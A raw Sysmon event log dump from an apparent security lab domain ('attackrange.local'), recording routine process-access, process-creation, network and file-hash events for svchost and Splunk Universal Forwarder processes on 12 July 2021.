08:04:26.369{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809771Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:26.369{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809770Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:26.369{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809769Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:26.369{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809768Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:26.369{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809767Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:26.369{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809766Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:26.369{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809765Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:26.369{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F78A-60EB-CA79-00000000D001}352C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809764Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:26.369{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F78A-60EB-CA79-00000000D001}352C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809763Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:26.355{0C1E0330-F78A-60EB-CA79-00000000D001}352C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000809762Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.221{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57420-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000809805Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.744{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F78B-60EB-CC79-00000000D001}3096C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809804Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.744{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809803Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.744{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809802Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.744{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809801Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.729{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809800Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.729{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809799Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.729{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809798Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.729{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809797Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.729{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809796Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.729{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809795Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.729{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F78B-60EB-CC79-00000000D001}3096C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809794Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.729{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F78B-60EB-CC79-00000000D001}3096C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809793Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.730{0C1E0330-F78B-60EB-CC79-00000000D001}3096C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809792Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.698{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C639F0930226BE1CBFAC14671337BF4,SHA256=02B23B0866CE8A620A862916A7AC211213B55D7DD439241B9B8AA690347611B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053393Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:27.117{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFE6DA7072884F8BAFDDC4CB89602ECF,SHA256=8FB81E5ECE15923481B34DBBBF1D173CFBDE2AD163980CC00D61AD1F77287A96,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809791Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.244{0C1E0330-F78B-60EB-CB79-00000000D001}23163828C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809790Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:27.057{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F78B-60EB-CB79-00000000D001}2316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809789Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 